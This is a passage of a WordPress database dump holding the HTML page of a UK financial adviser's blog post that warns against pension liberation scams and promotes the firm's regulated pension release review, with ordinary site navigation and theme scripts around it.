menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Pension Liberation – Good plan or bad scam?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Pension Liberation – Good plan or bad scam?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-5890\" class=\"post-5890 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Pension Liberation – Good plan or bad scam?</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p><span style=\"font-size: small;\">There’s been a great deal of talk in the press lately about <b>pension liberation</b> – This is not to be confused with legal FCA/HMRC approved ‘<b>pension unlocking</b>’ or ‘<b>pension release</b>’ for the over 55.  </span></p>&#13;\n<p><span style=\"font-size: small;\">Unfortunately even these popular search terms have been hijacked by unregulated marketing companies, making it harder for consumers to differentiate between regulated and non regulated advice.</span></p>&#13;\n<p><span style=\"font-size: small;\">The tone of these pension liberation articles has been generally negative. Why is that?</span></p>&#13;\n<p><span style=\"font-size: small;\">Let me start by saying that we have been providing regulated pension advice to meet the needs of UK consumers for over 20 years, but even we are astounded at the number off online marketing websites popping up in the last 12 months, who are acting unscrupulously. </span></p>&#13;\n<p>Such companies have been advertising through the web, firing out spam text messages and making cold calls ( I even got one call on a Sunday evening at 8pm) claiming to be able to unlock pension pots prior to the age of 55 – with all sorts of written, verbal offers and claims on pension loans deals and legal loop holes to allow access to your pension before age 55.</p>&#13;\n<p><span style=\"font-size: small;\">We  have taken our fair share of cold calls and even done our bit of mystery shopping leaving us scratching our heads in amazement at the information provided and the lack of consumer protection being offered. We emphasis that times are hard for many, and a good number of people are looking for ways to cash in on their assets, but at what cost!!</span></p>&#13;\n<p><span style=\"font-size: small;\">So why is it happening? It’s  a direct result of the economic downturn and also due to the post 2006 simplification regime where schemes do not have to be approved by HMRC. They only need to be registered with HMRC and anyone can do this. and to many this seems too good to be true. And here’s the crunch – </span><b style=\"font-size: small;\">it generally is</b><span style=\"font-size: small;\">.</span></p>&#13;\n<p><span style=\"font-size: small;\">If you have a pension scheme, you can normally only access that pot of money after you have turned 55. You certainly cannot release  up to the full amount as positioned by these scam schemes, and to do so is fraudulent if the companies in question fail to disclose that pension liberation is liable to a huge tax charge and high charges that will wipe out most of your pension pot.</span></p>&#13;\n<p><span style=\"font-size: small;\">This is something that is on the rise, but is also something that is being taken very seriously. In May of this year, police made a number of arrests as they raided a ‘boiler-room’ operation in London which was suspected of sending out pension liberation spam text messages.</span></p>&#13;\n<p><span style=\"font-size: small;\">The Pensions Regulator, HMRC and Action Fraud are all keeping a very close eye on the situation, they have acted to close down up to 400 of schemes,  and have combined to produce a number of leaflets on the subject of pension liberation. Have a look for yourself by clicking on the <b>pension liberation link</b>. <span style=\"color: #0000ff;\"><a title=\"Pension Liberation\" href=\"http://www.hmrc.gov.uk/pensionschemes/pen-liberation.htm\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.hmrc.gov.uk\']);\" target=\"_blank\"><span style=\"color: #0000ff;\">HMRC pension liberation</span></a></span></span></p>&#13;\n<p><span style=\"font-size: small;\">However, there <b>are</b> some people who are entitled to pension release at age 55. At Investor London, we have a <b>pension release scheme</b><a title=\"Pension Release\" href=\"../pensions/pension-release/\" target=\"_blank\"> <span style=\"color: #0000ff;\"><span style=\"color: #0000ff;\">Pension Release Review</span></span></a>  which is authorised and regulated by the Financial Conduct Authority (FCA). You may be entitled to release up to 25% of your pension early (after you turn 55) in a tax-free lump sum.</span></p>&#13;\n<p><span style=\"font-size: small;\">Yes, it doesn’t apply to everyone. But we’re honest and transparent when it comes to that. Our clients have always been at the centre of what we do and how we operate. So, why not give us a free call on <b> </b>to discuss your pension release options?</span></p>&#13;\n<p><span style=\"font-size: small;\">We do things right. We do things properly. We do things legally.</span></p>&#13;\n<p><span style=\"font-size: small;\">A Investor London pension review could be just what you need for a brighter future.</span></p>&#13;\n<p><br/>&#13;\nStrategic Development Director</p>&#13;\n<p> </p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><span>Comments Off</span>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/&amp;p[title]=Pension%20Liberation%20%E2%80%93%20Good%20plan%20or%20bad%20scam?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Pension+Liberation+%E2%80%93+Good+plan+or+bad+scam%3F%20http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/&amp;title=Pension%20Liberation%20%E2%80%93%20Good%20plan%20or%20bad%20scam?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/&amp;title=Pension%20Liberation%20%E2%80%93%20Good%20plan%20or%20bad%20scam?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fpension-liberation-good-plan-or-bad-scam%2F&amp;name=Pension+Liberation+%E2%80%93+Good+plan+or+bad+scam%3F&amp;description=There%E2%80%99s+been+a+great+deal+of+talk+in+the+press+lately+about+pension+liberation+%E2%80%93+This+is+not+to+be+confused+with%C2%A0legal+FCA%2FHMRC+approved%C2%A0%E2%80%98pension+unlocking%E2%80%99+or+%E2%80%98pension+release%E2%80%99+for+the+over+55.%C2%A0+Unfortunately%C2%A0even%C2%A0these+popular+search%C2%A0terms+have+been+hijacked+by%C2%A0unregulated+marketing+companies%2C+making+it+harder+for+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Pension Liberation – Good plan or bad scam?&amp;body=http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Investor London</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are closed. -->&#13;\n		<p class=\"no-comments\">Comments are closed.</p>&#13;\n&#13;\n	&#13;\n&#13;\n								</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				<p class=\"web\">Web: <a href=\"/\">Investor London</a></p>&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	Pension Liberation – Good plan or bad scam?','There’s been a great deal of talk in the press about pension liberation, this is not the same as legal ‘pension unlocking’ or ‘pension release’ for over 55','publish','closed','closed','','pension-liberation-good-plan-or-bad-scam','','','2017-09-21 16:34:36','2017-09-21 16:34:36','',0,'http://www.equalitywalk.org.uk/pension-liberation-good-plan-or-bad-scam',0,'page','',0),(90,1,'2017-09-21 16:34:36','2017-09-21 16:34:36','<body class=\"single single-post postid-8701 single-format-video light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li 